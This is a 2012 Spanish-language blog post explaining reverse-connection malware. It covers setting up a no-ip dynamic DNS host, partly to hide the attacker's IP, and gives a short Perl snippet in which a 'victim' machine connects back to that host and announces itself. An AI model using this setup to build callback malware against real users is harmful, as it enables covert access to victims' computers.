miércoles 11 de enero de 2012

Conexion Inversa Orientado a Malware

Escribo esto para explicarles masomenos como funcionan algunos malwares que se desarrollan ahora.

Lo que hacen es que las personas se conecten a la PC del Atacante y no El Atacante a la PC de la Víctima.


Set My PC:

Vamos a hacer lo siguiente, vamos a http://www.no-ip.com/ y nos vamos a registrar luego nos logueamos y vamos a ir a la pestaña Add a Host del Menu.

En El Host Name Ponemos SeguridadBlanca o bueno lo que deseen en este caso será SeguridadBlanca y al lado seleccionan lo que quieren yo escogí no-ip.org.

En la opcion de abajo donde dice: Host Type ponganlo en DNS Host (A) en la ip dejenla como está. Luego denle click al Boton Create Host.


Ahora Deben de Bajarse el Client de No-IP:

Download desde aquí yo en este caso estoy booteando mi win7 asi que me bajo la version para windows :)


Ahora me la bajo instalo todo y cuando abro me pide que me loguee, me logueo con mi cuenta de no-ip y aparecerá SeguridadBlanca.no-ip.org seleccionan el checkbox y ponen Save... luego les deben de salir tres checks:

Client ID
Updating
IP


si no te salen los tres checks es porque hay algo mal xD no funcionará muy bien si sales por proxy o estás en la oficina donde te bloquean cosas.


Ahora lo anterior de Setiar el no-ip es por dos motivos: El primero es porque nuestra ip cambia constantemente por lo menos en mi pais es así entonces para no tener que estar cambiando y cambiando pues usamos el no-ip que nos mantiene una ip seguridadblanca.no-ip.org y el otro motivo es para un tema de ocultar nuestra ip.


Ahora vamos a crear la conexion inversa.


use IO::Socket;
my $sock = new IO::Socket::INET (
PeerAddr => 'seguridadblanca.no-ip.org',
PeerPort => '90',
Proto => 'tcp',
);
die "No se creo el socket: $!\n" unless $sock;
print $sock "Soy tu Victima\n";
close($sock);


Bueno con eso se nos conecta la victima :)


aqui tambien tienen un chat en visual basic basado en sockets que pueden usar... adapten los sockets nomas bueno y ese code de perl es solo para hacer la conexion luego nuestro server debe correr en el puerto 90 y genial tenemos a las victimas conectadas a nosotros.



Saludos,
Camilo G.
Publicado por en 09:11
Etiquetas: ,
Suscribirse a: Enviar comentarios (Atom)